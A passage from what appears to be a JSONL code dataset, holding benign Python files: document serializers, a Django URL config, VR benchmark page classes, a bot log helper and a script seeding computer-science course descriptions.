ids\n\n :return: ids: integer array of cat ids\n \"\"\"\n\n if category_names is None:\n category_names = []\n if super_category_names is None:\n super_category_names = []\n if category_ids is None:\n category_ids = []\n\n category_names = [category_names] if isinstance(category_names, str) else category_names\n super_category_names = [super_category_names] if isinstance(super_category_names, str) else super_category_names\n category_ids = [category_ids] if isinstance(category_ids, int) else category_ids\n\n if len(category_names) == len(super_category_names) == len(category_ids) == 0:\n cats = self.dataset[\"categories\"]\n else:\n cats = self.dataset[\"categories\"]\n cats = cats if len(category_names) == 0 else [cat for cat in cats if cat[\"name\"] in category_names]\n cats = (\n cats\n if len(super_category_names) == 0\n else [cat for cat in cats if cat[\"supercategory\"] in super_category_names]\n )\n cats = cats if len(category_ids) == 0 else [cat for cat in cats if cat[\"id\"] in category_ids]\n ids = [cat[\"id\"] for cat in cats]\n return ids\n\n def get_image_ids(\n self, img_ids: Optional[Union[int, Sequence[int]]] = None, cat_ids: Optional[Union[int, Sequence[int]]] = None\n ) -> Sequence[int]:\n \"\"\"\n Get img ids that satisfy given filter conditions.\n\n :param img_ids: get imgs for given ids\n :param cat_ids: get imgs with all given cats\n\n :return: ids: integer array of img ids\n \"\"\"\n\n if img_ids is None:\n img_ids = []\n if cat_ids is None:\n cat_ids = []\n\n img_ids = [img_ids] if isinstance(img_ids, int) else img_ids\n cat_ids = [cat_ids] if isinstance(cat_ids, int) else cat_ids\n\n if len(img_ids) == len(cat_ids) == 0:\n ids = set(self.imgs.keys())\n else:\n ids = set(img_ids)\n for i, cat_id in enumerate(cat_ids):\n if i == 0 and len(ids) == 0:\n ids = set(self.cat_to_imgs[cat_id])\n else:\n ids &= set(self.cat_to_imgs[cat_id])\n return list(ids)\n\n def load_anns(self, ids: Optional[Union[int, Sequence[int]]] = None) -> List[JsonDict]:\n \"\"\"\n Load anns with the specified ids.\n\n :param ids: integer ids specifying anns\n\n :return: anns: loaded ann objects\n \"\"\"\n if ids is None:\n ids = []\n ids = [ids] if isinstance(ids, int) else ids\n\n return [self.anns[id] for id in ids]\n\n def load_cats(self, ids: Optional[Union[int, Sequence[int]]] = None) -> List[JsonDict]:\n \"\"\"\n Load cats with the specified ids.\n\n :param ids: integer ids specifying cats\n\n :return: cats: loaded cat objects\n \"\"\"\n if ids is None:\n ids = []\n ids = [ids] if isinstance(ids, int) else ids\n\n return [self.cats[idx] for idx in ids]\n\n def load_imgs(self, ids: Optional[Union[int, Sequence[int]]] = None) -> List[JsonDict]:\n \"\"\"\n Load anns with the specified ids.\n\n :param ids: integer ids specifying img\n\n :return: imgs: loaded img objects\n \"\"\"\n if ids is None:\n ids = []\n ids = [ids] if isinstance(ids, int) else ids\n\n return [self.imgs[idx] for idx in ids]\n\n\nclass SerializerCoco:\n \"\"\"\n Class for serializing annotation files in Coco format. Coco comes in JSON format which is a priori not\n serialized. This class implements only the very basic methods to generate a dataflow. It wraps the coco class\n from pycocotools and assembles annotations that belong to the image. Note, that the conversion into the core\n `Image` has to be done by yourself.\n \"\"\"\n\n @staticmethod\n def load(path: Pathlike, max_datapoints: Optional[int] = None) -> DataFlow:\n \"\"\"\n Loads a .json file and generates a dataflow.\n\n **Example:**\n\n {'images':[img1,img2,...], 'annotations':[ann1,ann2,...],...}\n\n it will generate a dataflow with datapoints\n\n\n {'image':{'id',...},'annotations':[{'id':…,'bbox':...}]}\n\n for each single image id.\n\n :param max_datapoints: Will stop the iteration once max_datapoints have been streamed.\n :param path: a path to a .json file.\n :return: dataflow to iterate from\n \"\"\"\n if not os.path.isfile(path):\n raise FileNotFoundError(path)\n file = os.path.split(path)[1]\n if not is_file_extension(file, \".json\"):\n raise FileExtensionError(f\"Expected .json file got {path}\")\n\n with timed_operation(\"Start loading .json file and serializing\"):\n coco = CocoParser(path)\n img_ids = coco.get_image_ids()\n imgs = coco.load_imgs(img_ids)\n\n with get_tqdm(total=len(imgs)) as status_bar:\n for img in imgs:\n img[\"annotations\"] = coco.img_to_anns[img[\"id\"]]\n status_bar.update()\n\n df = CustomDataFromList(imgs, max_datapoints=max_datapoints)\n return df\n\n @staticmethod\n def save() -> None:\n \"\"\"\n Not implemented\n \"\"\"\n raise NotImplementedError\n\n\nclass SerializerPdfDoc:\n \"\"\"\n Serialize a pdf document with an arbitrary number of pages.\n\n **Example:**\n\n df = SerializerPdfDoc.load(\"path/to/document.pdf\")\n\n will yield datapoints:\n\n {\"path\": \"path/to/document.pdf\", \"file_name\" document_page_1.pdf, \"pdf_bytes\": b\"some-bytes\"}\n \"\"\"\n\n @staticmethod\n def load(path: Pathlike, max_datapoints: Optional[int] = None) -> DataFlow:\n \"\"\"\n Loads the document page wise and returns a dataflow accordingly.\n\n :param path: Path to the pdf document.\n :param max_datapoints: The maximum number of pages to stream.\n :return: A dict with structure {\"path\":... ,\"file_name\": ..., \"pdf_bytes\": ...}. The file name is a\n concatenation of the physical file name and the current page number.\n \"\"\"\n\n file_name = os.path.split(path)[1]\n prefix, suffix = os.path.splitext(file_name)\n df: DataFlow\n df = CustomDataFromIterable(PDFStreamer(path=path), max_datapoints=max_datapoints)\n df = MapData(\n df,\n lambda dp: {\n \"path\": path,\n \"file_name\": prefix + f\"_{dp[1]}\" + suffix,\n \"pdf_bytes\": dp[0],\n \"page_number\": dp[1],\n \"document_id\": get_uuid_from_str(prefix),\n },\n )\n return df\n\n @staticmethod\n def save(path: Pathlike) -> None:\n \"\"\"\n Not implemented\n \"\"\"\n raise NotImplementedError\n\n @staticmethod\n def split(path: Pathlike, path_target: Optional[Pathlike] = None, max_datapoint: Optional[int] = None) -> None:\n \"\"\"\n Split a document into single pages.\n \"\"\"\n if path_target is None:\n path_target, _ = os.path.split(path)\n if not os.path.isdir(path_target):\n raise NotADirectoryError(path)\n df = SerializerPdfDoc.load(path, max_datapoint)\n for dp in df:\n with open(os.path.join(path_target, dp[\"file_name\"]), \"wb\") as page:\n page.write(dp[\"pdf_bytes\"])\n","repo_name":"deepdoctection/deepdoctection","sub_path":"deepdoctection/dataflow/custom_serialize.py","file_name":"custom_serialize.py","file_ext":"py","file_size_in_byte":19612,"program_lang":"python","lang":"en","doc_type":"code","stars":1814,"dataset":"github-code","pt":"52"} +{"seq_id":"14534474792","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nfrom Legacy import settings\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'Legacy.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n\n url(r'^admin/', include(admin.site.urls)),\n url(r'^$', 'content.views.index'),\n url(r'^articles/', include('content.urls')),\n\turl(r'^search/$', 'content.views.search'),\n \n)\n\nif settings.DEBUG is False: #if DEBUG is True it will be served automatically\n urlpatterns += patterns('',\n url(r'^static/(?P.*)$', 'django.views.static.serve', {'document_root': settings.STATICFILES_DIRS[0]}),\n )","repo_name":"JeremyMBell/Legacy","sub_path":"Legacy/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12310525445","text":"import os\nfrom telemetry import page\nfrom contrib.vr_benchmarks import (shared_android_vr_page_state as\n vr_state)\n\nWEBVR_SAMPLE_DIR = os.path.join(\n os.path.dirname(__file__), '..', '..', '..', '..', 'chrome', 'test',\n 'data', 'vr', 'webvr_info', 'samples')\n\n\nWEBXR_SAMPLE_DIR = os.path.join(\n os.path.dirname(__file__), '..', '..', '..', '..', 'chrome', 'test',\n 'data', 'vr', 'webxr_samples')\n\n\nclass _VrXrSamplePage(page.Page):\n \"\"\"Superclass for all VR and XR sample pages.\"\"\"\n\n def __init__(self, sample_directory, sample_page, page_set,\n url_parameters=None, extra_browser_args=None):\n url = '%s.html' % sample_page\n if url_parameters is not None:\n url += '?' + '&'.join(url_parameters)\n name = url.replace('.html', '')\n url = 'file://' + os.path.join(sample_directory, url)\n super(_VrXrSamplePage, self).__init__(\n url=url,\n page_set=page_set,\n name=name,\n extra_browser_args=extra_browser_args,\n shared_page_state_class=vr_state.SharedAndroidVrPageState)\n self._shared_page_state = None\n\n def Run(self, shared_state):\n self._shared_page_state = shared_state\n super(_VrXrSamplePage, self).Run(shared_state)\n\n @property\n def platform(self):\n return self._shared_page_state.platform\n\n\nclass VrSamplePage(_VrXrSamplePage):\n \"\"\"Superclass for all VR sample pages.\"\"\"\n\n def __init__(self, sample_page, page_set, url_parameters=None,\n extra_browser_args=None):\n super(VrSamplePage, self).__init__(\n sample_directory=WEBVR_SAMPLE_DIR,\n sample_page=sample_page,\n page_set=page_set,\n url_parameters=url_parameters,\n extra_browser_args=extra_browser_args)\n\n\nclass XrSamplePage(_VrXrSamplePage):\n \"\"\"Superclass for all XR sample pages.\"\"\"\n\n def __init__(self, sample_page, page_set, url_parameters=None,\n extra_browser_args=None):\n super(XrSamplePage, self).__init__(\n sample_directory=WEBXR_SAMPLE_DIR,\n sample_page=sample_page,\n page_set=page_set,\n url_parameters=url_parameters,\n extra_browser_args=extra_browser_args)\n\n @property\n def serving_dir(self):\n # The default implementation of serving_dir results in the WebXR pages not\n # loading properly since the JS resources are in webxr_samples/js/, and the\n # default implementation results in webxr_samples/tests/ being the serving\n # directory.\n return WEBXR_SAMPLE_DIR\n","repo_name":"kiwibrowser/src","sub_path":"tools/perf/contrib/vr_benchmarks/vr_sample_page.py","file_name":"vr_sample_page.py","file_ext":"py","file_size_in_byte":2453,"program_lang":"python","lang":"en","doc_type":"code","stars":2475,"dataset":"github-code","pt":"52"} +{"seq_id":"41104393048","text":"import datetime\nimport sys\n\n\ndef write_log(message: dict):\n today = datetime.datetime.today().strftime('%d/%m/%Y')\n now = datetime.datetime.now().strftime('%H:%M:%S')\n with open('bot.log', 'a') as logfile:\n logfile.write(f'{message[\"text\"]:<25}{message[\"action\"]:<15}{now:<15}{today}\\n')\n logfile.close()\n\n\ndef read_log():\n with open('bot.log', 'r') as logfile:\n print(logfile.read())\n logfile.close()\n\n","repo_name":"fantunesdev/bot-topwar","sub_path":"game_functions/handle_log.py","file_name":"handle_log.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29357426577","text":"from app import db, models\nimport datetime\n\ncourses = []\n\ncourses.append(models.Course(course = 'CSC 1010',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Programming for All',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'nonmajor',\n\t\t\t\t\t\t\tdescription = 'A unified view of the powerful tools for '\n\t\t\t\t\t\t\t'manipulating text and the algorithms they implement; '\n\t\t\t\t\t\t\t'complexity and security of operations on text; locating '\n\t\t\t\t\t\t\t'and searching online text databases and bibliographies via '\n\t\t\t\t\t\t\t'the Internet; alternative text structures: hypertext, '\n\t\t\t\t\t\t\t'multimedia; alternative input techniques: scanning, voice.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 1020',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Computing and the Web',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'nonmajor',\n\t\t\t\t\t\t\tdescription = 'Information representation and manipulation; '\n\t\t\t\t\t\t\t'file systems and directories; compatibility and data '\n\t\t\t\t\t\t\t'exchange; security and privacy; elements of computer '\n\t\t\t\t\t\t\t'architectures and operating systems; computer networks, '\n\t\t\t\t\t\t\t'the Internet, and the World Wide Web; web site design '\n\t\t\t\t\t\t\t'principles and creation; PC based examples and illustrations.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 1024',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Computing for Scientists',\n\t\t\t\t\t\t\tcredits = 1,\n\t\t\t\t\t\t\tlevel = 'nonmajor',\n\t\t\t\t\t\t\tdescription = 'Active learning of computing skills necessary '\n\t\t\t\t\t\t\t'for scientists: datagraphing, regression analysis, animation, '\n\t\t\t\t\t\t\t'symbolic computing, information search techniques, scientific '\n\t\t\t\t\t\t\t'report writing, web page construction, fundamentals of programming.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 1051',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Algorithms and Data Structures I',\n\t\t\t\t\t\t\tcredits = 4,\n\t\t\t\t\t\t\tlevel = 'crossover',\n\t\t\t\t\t\t\tdescription = 'Algorithm design and programming fundamentals: data, '\n\t\t\t\t\t\t\t'variables, selection, loops, arrays, input/output; basic graphics '\n\t\t\t\t\t\t\t'and graphical user interfaces; object-oriented design: objects, '\n\t\t\t\t\t\t\t'classes, methods, encapsulation;',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 1800',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Organization of Programming Languages',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'High level language features: data types, control '\n\t\t\t\t\t\t\t'structures; formal lexical and syntactical analysis; operational '\n\t\t\t\t\t\t\t'semantics; language translation.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 1052 and CSC 1300'))\n\ncourses.append(models.Course(course = 'CSC 2500',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Survey of Information Science',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Brief introductions to several areas in which '\n\t\t\t\t\t\t\t'problems in information use are important. Examples are business, '\n\t\t\t\t\t\t\t'law, biology, medicine, electronic commerce, and libraries.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 3400',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Information Retrieval',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Theory and practice of location, organization, '\n\t\t\t\t\t\t\t'and rendering of meaningful content from largely unorganized sources.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 1052 and CSC 1300'))\n\ncourses.append(models.Course(course = 'CSC 4140',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Theory of Information',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Information and coding theory, data compression, cryptology.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 1300'))\n\ncourses.append(models.Course(course = 'CSC 4181',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Compiler Construction',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Lexical and syntactical analysis; code generation; error '\n\t\t\t\t\t\t\t'recovery; recursive descent compilation; handling a run time environment.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 1600 or CSC 2405'))\n\ncourses.append(models.Course(course = 'CSC 4300',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Computer Graphics',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Hardware and software systems in computer graphics, graphics '\n\t\t\t\t\t\t\t'programming languages, (PHIGS, VRML), modeling in 3D, development of '\n\t\t\t\t\t\t\t'interactive software, animation.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 2405'))\n\ncourses.append(models.Course(course = 'CSC 4380',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Information Visualization',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'The presentation of information; visual cognition, scientific '\n\t\t\t\t\t\t\t'visualization, illustration presentation, color theory, motion dynamics, '\n\t\t\t\t\t\t\t'image processing.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 1052'))\n\ncourses.append(models.Course(course = 'CSC 4480',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Principles of Database Systems',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Concepts and technology of database management systems and '\n\t\t\t\t\t\t\t'data modeling with an emphasis on the relational model; database querying '\n\t\t\t\t\t\t\t'and normalization; physical data organization.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 1051 and CSC 1300'))\n\ncourses.append(models.Course(course = 'CSC 4500',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Artificial Intelligence',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'The nature of intelligence and the question of its computer '\n\t\t\t\t\t\t\t'implementation; search algorithms; knowledge representation; automated '\n\t\t\t\t\t\t\t'deduction; natural language understanding; planning; problem solving.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 2053'))\n\ncourses.append(models.Course(course = 'CSC 4630',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Software Development and Systems',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Operating system structures; system calls; system libraries; '\n\t\t\t\t\t\t\t'interprocess communication; user-interface programming environments; '\n\t\t\t\t\t\t\t'software utilities; software portability.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 2405 or CSC 1600'))\n\ncourses.append(models.Course(course = 'CSC 4730',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Human Computer Interaction',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Design of the user/system interface; measurement of human-computer '\n\t\t\t\t\t\t\t'interaction; models of the user and user communities; design criteria for the '\n\t\t\t\t\t\t\t'interface; user interface management systems (UIMS); test and evaluation '\n\t\t\t\t\t\t\t'strategies and tools.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 1052 and (MAT 2310 or MAT 4310)'))\n\ncourses.append(models.Course(course = 'CSC 4800',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Web Application Development',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Theory and design of web-based applications: stylesheets, applets, '\n\t\t\t\t\t\t\t'HTML, CGI programming, web server design, web site design, security, multimedia '\n\t\t\t\t\t\t\t'representations, encryption, compression.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 1052'))\n\ncourses.append(models.Course(course = 'CSC 4900',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Computer Networks',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'undergraduate',\n\t\t\t\t\t\t\tdescription = 'Underlying principles of computer networks; OSI and TCP/IP '\n\t\t\t\t\t\t\t'architecture; LAN technologies; interconnecting devices: hubs, bridges, switches, '\n\t\t\t\t\t\t\t'routers, gateways; IP addressing and forwarding; routing protocols; transport '\n\t\t\t\t\t\t\t'protocols: error, flow, and congestion control; client-server communication; '\n\t\t\t\t\t\t\t'authentication and authorization; security threats and solutions.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 2400'))\n\ncourses.append(models.Course(course = 'CSC 5930',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Topics in Computer Science',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'crossover',\n\t\t\t\t\t\t\tdescription = 'Lecture presentation of selected topics in computer science. '\n\t\t\t\t\t\t\t'May be repeated for credit if topics are different.',\n\t\t\t\t\t\t\tprerequisites = 'Varies with the topic'))\n\ncourses.append(models.Course(course = 'CSC 3070',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Emerging Technology Trends',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'crossover',\n\t\t\t\t\t\t\tdescription = 'Investigate new technologies and current applications. Explore '\n\t\t\t\t\t\t\t'when and how to apply new technologies with sensitivity to feasibility, '\n\t\t\t\t\t\t\t'financial viability, and overall effectiveness. Culminates in team-driven '\n\t\t\t\t\t\t\t'exploitation of a new technology.',\n\t\t\t\t\t\t\tprerequisites = 'Junior Standing'))\n\ncourses.append(models.Course(course = 'CSC 7000',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Algorithms and Programming',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Algorithm design and refinement; loop and selection control; '\n\t\t\t\t\t\t\t'recursion; arrays, pointers, records and strings; abstract data types: linked '\n\t\t\t\t\t\t\t'lists, stacks, queues, binary trees, elementary searching and sorting.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 7100',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Computer Systems',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Fundamental concepts in computer architecture and operating '\n\t\t\t\t\t\t\t'systems. Information representation, gates and digital logic, ALU and central '\n\t\t\t\t\t\t\t'processing organization, instruction sets, basics of pipelining, processes, '\n\t\t\t\t\t\t\t'memory management and file systems.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 8301',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Design and Analysis of Algorithms',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Fundamental strategies for algorithm design; mathematical and '\n\t\t\t\t\t\t\t'empirical techniques for analysis of nonrecursive and recursive algorithms, '\n\t\t\t\t\t\t\t'with applications such as sorting, searching, string processing and graphs; '\n\t\t\t\t\t\t\t'NP-complete problems and approximation algorithms.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 8310',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Linguistics of Programming Languages',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Organization, characteristics, constructs and design principles '\n\t\t\t\t\t\t\t'of programming languages; syntax, semantics, and pragmatics; language '\n\t\t\t\t\t\t\t'implementation issues; different programming paradigms such as imperative, '\n\t\t\t\t\t\t\t'functional, object-oriented, and logic programming.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 8400',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Computer Systems',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Study of computing systems from the point of view of the '\n\t\t\t\t\t\t\t'programmer. Topics include information representation, processor '\n\t\t\t\t\t\t\t'architecture, computer performance, storage management, security and '\n\t\t\t\t\t\t\t'concurrent programming.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 8000',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Foundations of Algorithms and Data Structures',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Programming in Java or another object-oriented language. '\n\t\t\t\t\t\t\t'Program design with an emphasis on the object paradigm. Classic algorithms '\n\t\t\t\t\t\t\t'and data structures. Significant programming assignments are required.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 8410',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Operating Systems Concepts',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Principles and techniques required for creating and understanding '\n\t\t\t\t\t\t\t'operating systems, including the areas of: system services, concurrent programming, '\n\t\t\t\t\t\t\t'process and resource control; deadlock detection, recovery, and prevention; memory '\n\t\t\t\t\t\t\t'management; file systems; protection and security.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 8400'))\n\ncourses.append(models.Course(course = 'CSC 8470',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Computer Graphics',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Interactive program development in 2D/3D graphics; event handling, '\n\t\t\t\t\t\t\t'real-time data sampling, and strategies in programming computer games; 2D/3D '\n\t\t\t\t\t\t\t'modeling; perspective viewing; object transformation; graphical user interface '\n\t\t\t\t\t\t\t'design.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 8301'))\n\ncourses.append(models.Course(course = 'CSC 8490',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Database Systems',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Architecture of a database system; conceptual and implementation '\n\t\t\t\t\t\t\t'models; query languages, design theory; integrity, security, and concurrency; '\n\t\t\t\t\t\t\t'discussion of some commercial systems.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 8301 and CSC 8410'))\n\ncourses.append(models.Course(course = 'CSC 8510',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Theory of Computability',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Automata theory: deterministic and non-deterministic finite '\n\t\t\t\t\t\t\t'automata, pushdown automata, regular languages, context-free grammars, '\n\t\t\t\t\t\t\t'pumping lemma. Computability and recursion theory; Turing machines and '\n\t\t\t\t\t\t\t'their variations, decidability and recursive enumerability, mapping '\n\t\t\t\t\t\t\t'reducibility and Turing reducibility, undecidability of the halting problem, '\n\t\t\t\t\t\t\t'logical theories and Godel\\'s incompleteness theorem. Complexity theory: time '\n\t\t\t\t\t\t\t'complexity, space complexity, major open problems on computational complexity.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 8530',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Distributed Systems',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'An introduction to distributed systems; distributed system '\n\t\t\t\t\t\t\t'architecture and design goals; networks and distributed protocols; '\n\t\t\t\t\t\t\t'distributed/network operating systems, including distributed resource '\n\t\t\t\t\t\t\t'control and management, concurrency and interprocess communication; remote '\n\t\t\t\t\t\t\t'procedure calling; client/server techniques and issues; reliability of '\n\t\t\t\t\t\t\t'distributed systems; security and authentication.',\n\t\t\t\t\t\t\tprerequisites = 'CSC 8301 and CSC 8410'))\n\ncourses.append(models.Course(course = 'CSC 8540',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Software Engineering',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'An introduction to software engineering covering development '\n\t\t\t\t\t\t\t'life-cycle models, requirements analysis and specification, design concepts '\n\t\t\t\t\t\t\t'and methods, testing, maintenance, CASE tools and management concerns. '\n\t\t\t\t\t\t\t'Additional topics may include reuse, metrics, experimentation, reengineering, '\n\t\t\t\t\t\t\t'development environments, and standards. The student may be required to write '\n\t\t\t\t\t\t\t'a research paper and/or give an in-class presentation.',\n\t\t\t\t\t\t\tprerequisites = 'None'))\n\ncourses.append(models.Course(course = 'CSC 8560',\n\t\t\t\t\t\t\tdepartment = 'Computing Sciences',\n\t\t\t\t\t\t\ttitle = 'Computer Networks',\n\t\t\t\t\t\t\tcredits = 3,\n\t\t\t\t\t\t\tlevel = 'graduate',\n\t\t\t\t\t\t\tdescription = 'Computer networks as an application development platform; '\n\t\t\t\t\t\t\t'services required by and provided to distributed applications; electronic '\n\t\t\t\t\t\t\t'mail systems enhancement; access to remote file systems; integration of '\n\t\t\t\t\t\t\t'remote resources such as components of the Web into applications; security; 